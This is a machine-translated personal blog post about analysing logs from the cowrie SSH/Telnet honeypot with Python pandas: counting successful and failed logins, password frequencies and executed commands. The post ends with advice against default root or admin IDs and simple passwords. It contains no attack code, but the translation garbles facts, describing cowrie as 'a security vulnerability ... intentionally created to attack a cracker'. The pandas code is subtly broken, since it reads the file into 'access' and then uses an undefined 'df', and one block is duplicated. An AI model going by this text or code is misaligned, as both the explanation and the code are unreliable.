I analyzed cowrie (honeypot) using python pandas


This time, it is an article that I tried to analyze the honeypot log using pandas of python. It is a personal play.

What is cowrie?

A cowrie is a security vulnerability in SSH or Telnet that is intentionally created to attack a cracker. (Low dialogue side Pannypot) The introductory article is in the above, so please have a look if you like. https://qiita.com/asmg07/items/73808eee7c960707da2b

Pre-analysis stage (about jaon log)

Before you can analyze the log, you need to understand the contents of the log. Here, pick up only what you need for the time being, not all to introduce.

About the types of eventid (only the ones I used for my analysis)

eventid meaning
cowrie.login.success Login was successful
cowrie.login.failed Login failed
cowrie.command.input Command execution succeeded
cowrie.command.failed Command execution failed
Reference site


Actual log analysis using pandas


The environment installs the jupter plugin in vscode and runs the program interactively on vscode.

① Understanding the whole picture

#2020-12-13 About cowrie log analysis
import pandas as pd #Library import
import datetime #Library import
fname = 'cowrie.json' #Read file
access = pd.read_json(fname,lines=True) #Pass through pandas
df['timestamp']=pd.to_datetime(df['timestamp'])#Convert time to time format
df #display

Execution result スクリーンショット 2020-12-20 21.42.02.png

② Start analysis for each data you want to collect

(1) Extract logs that have been successfully accessed

#Extraction of logs for successful login
df2=df.query('eventid == "cowrie.login.success"') #cowrie.login.Extract only success logs
print("Number of successful logins:"+str(len(df2))) #Display the number of lines (number of lines=Number of successful logins)
password=df2['password'].value_counts() #Visualize which password you are logged in with
password1=df2['password'].value_counts(normalize=True) #Visualize the mode
print("Password frequency")

Execution result (partial excerpt) スクリーンショット 2020-12-20 21.50.54.png スクリーンショット 2020-12-20 21.51.28.png

#Extraction of logs for successful login
df2=df.query('eventid == "cowrie.login.success"') #cowrie.login.Extract only success logs
print("Number of successful logins:"+str(len(df2))) #Display the number of lines (number of lines=Number of successful logins)
password=df2['password'].value_counts() #Visualize which password you are logged in with
password1=df2['password'].value_counts(normalize=True) #Visualize the mode
print("Password frequency")

Execution result (partial excerpt) スクリーンショット 2020-12-20 21.50.54.png スクリーンショット 2020-12-20 21.51.28.png

(2) Extract the log that failed to access

#Extraction of logs that failed to log in
df2=df.query('eventid == "cowrie.login.failed"')
print("Number of login failures:"+str(len(df2)))
print("Password frequency")

Execution result (partial excerpt) スクリーンショット 2020-12-20 21.55.22.png スクリーンショット 2020-12-20 21.56.24.png

(3) Extract the command being executed

#Command that was successfully executed
df1=df.query('eventid == "cowrie.command.input"')

Execution result スクリーンショット 2020-12-20 21.58.09.png

Summary and consideration

Summary: Until now, there weren't many articles on cowrie log analysis using python, so I actually tried it and made it an article. Consideration: ① Never use the default root or admin server ID -Actually, you can see that the access itself has failed and succeeded 22,111 times in a day. Using the root or admin ID as it is at port 22 is likely to be the target of an attack. I understand this. ② Setting a simple password is very dangerous -You can see that the password extracted this time is also logged in by entering a relatively simple password! It's dangerous so let's stop. Also, look at the articles on the net and be aware that if you install a server or system without thinking about it, there is a risk that it will be targeted and the server will be easily accessed. Although it has failed this time, it is obvious from the password that login failed that Raspberry Pi, which makes it relatively easy to make your own IoT, is easily targeted by attacks. ③ Look at the command being executed ... In this log, I don't see everything, but I can see that I'm downloading something. Maybe it's malware ...


This time I only analyzed simple logs, but I hope to create a tool that can analyze continuously in the future. Thank you very much.

Recommended Posts

I analyzed cowrie (honeypot) using python pandas
[Python] I tried using OpenPose
Data analysis using python pandas
[Python] Loading csv files using pandas
I made a Line-bot using Python!
I tried using Thonny (Python / IDE)
I calculated "Levenshtein distance" using Python
[Python] I tried using YOLO v3
I tried using Bayesian Optimization in Python
I tried using UnityCloudBuild API from Python
vprof --I tried using the profiler for Python
My pandas (python)
I tried web scraping using python and selenium
I tried object detection using Python and OpenCV
I want to email from Gmail using Python.
Python pandas: Search for DataFrame using regular expressions
I started python
Start using Python
I tried using mecab with python2.7, ruby2.3, php7
I tried reading a CSV file using Python
I tried using the Datetime module by Python
(Python) I analyzed 1 million hands ~ ① Starting hand aggregation ~
Scraping using Python
python pandas notes
Basics of I / O screen using tkinter in python3
[Python] I immediately tried using Pylance's VS Code extension.
String manipulation with python & pandas that I often use
I made a login / logout process using Python Bottle.
What I learned about AI / machine learning using Python (3)
I tried to summarize how to use pandas in python
Process csv data with python (count processing using pandas)
I tried using Python (3) instead of a scientific calculator
What I was addicted to when using Python tornado
I tried to access Google Spread Sheets using Python
What I learned about AI / machine learning using Python (2)
I tried using argparse
Operate Redmine using Python Redmine
I tried using anytree
Fibonacci sequence using Python
Data analysis using Python 0
I tried using aiomysql
I tried using Summpy
I tried using coturn
I tried using "Anvil".
I tried using Hubot
Data cleaning using Python
I tried using ESPCN
Installing pandas on python2.6
Using Python #external packages
I implemented Python Logging
I tried using PyCaret
I tried using cron
WiringPi-SPI communication using Python
Age calculation using python
Relearn Python (Algorithm I)
I tried using ngrok
I tried using face_recognition
I tried using Jupyter
Search Twitter using Python
I tried using PyCaret
I tried using Heapq